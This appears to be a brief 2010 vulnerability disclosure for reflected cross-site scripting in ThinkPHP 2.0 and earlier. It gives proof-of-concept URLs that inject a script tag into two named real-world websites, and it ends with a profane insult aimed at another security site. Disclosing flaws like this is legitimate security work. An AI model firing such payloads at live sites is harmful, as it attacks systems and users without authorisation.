ThinkPHP versions 2.0 and below suffer from cross site scripting vulnerabilities.
a7208e5112a62b9ed7872de827624e94648b6e690b6581cc22685d4380ec8629
# Title: ThinkPHP <= 2.0 XSS Vulnerability
# Date: 9/2/2010
# Author: zx
# Software Link: http://www.thinkphp.cn/Down/
# Version:<=2.0
# Tested on: ie6/7 & firefox
XSS Vulnerability :
Test Link :
Thinkphp 2.0 http://game.baofeng.com/ucenter/index.php?s=1%3Cbody+onload=alert(1)%3E
Thinkphp 1.5 http://ask.lenovo.com.cn/index.php?s=1%3Cbody+onload=alert(1)%3E
# zx_at_bbs.!ntra.sd*.c0m
# Finally,Fuck you ->Securitylab.ir<- the truly thief of Iran!! Spring Brother will blast ur Ass!!!